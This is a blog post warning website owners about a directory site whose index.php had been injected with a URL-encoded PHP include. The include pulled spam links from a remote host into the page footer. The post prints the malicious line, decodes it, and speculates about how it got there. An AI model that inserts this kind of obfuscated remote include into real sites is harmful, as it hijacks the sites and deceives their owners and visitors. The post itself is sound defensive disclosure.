Recently, the owner of Submission4U Directory was informed that his directory contained porn links in his source code. After looking at the source code generated in the browser, he confirmed that there was indeed porn links appearing after the footer.

After searching through all the source code of the directory, the culprit was finally found in the form of the following code in the file index.php:

include(urldecode(”%68%74%74%70%3a%2f%2f%62%
65%73%74%72%65%7a%75%6c%74%2e%63%6f%6d
%2f%73%63%72%2f%30%37%2e%74%78%74″));

This code was found to be decoded to file : http:// bestrezult . com / scr / 07 . txt, which contains tens of porn links.

Thankfully, after deletion of the above line of code from the index.php file, the porn links were removed. Solution was simple although the mystery still remains, how did the code ever find its way into the file?

A possible explanation include the wrong setting of permissions of the index.php to 0777, allowing rewriting of the file via the ‘contact form’. It has apparently been observed with another directory owner the insertion of some type of iframe into the code using the contact form. However, the implications of this explanation is far-reaching. It implies that there is a possible loop-hole or crack via forms to access the master password needed for editing the ftp files. As such, for those who may have this problem, the immediate action would be to change all passwords if this conjecture was indeed true.

Investigations also showed that there were several other sites hit with this same attack and occuring on pure html sites and even Wordpress sites. Thus, it does not only concern directory scripts.

Unfortunately, the answer is still not known and I wished I could tell you exactly how and where the vicious code came from. But, at the very least, we know that this problem is easily detected and can be easily resolved. I would like to thank Antonio (nick on DigitalPoint), owner of Submission4U Directory for his kind agreement to share this story to alert other site owners. In the same way, if you know of other possible explanations, please post it here for the benefit of others!

Liked this post? Help me tell others! Subscribe Here:

RSS feed | Trackback URI

1 Comment »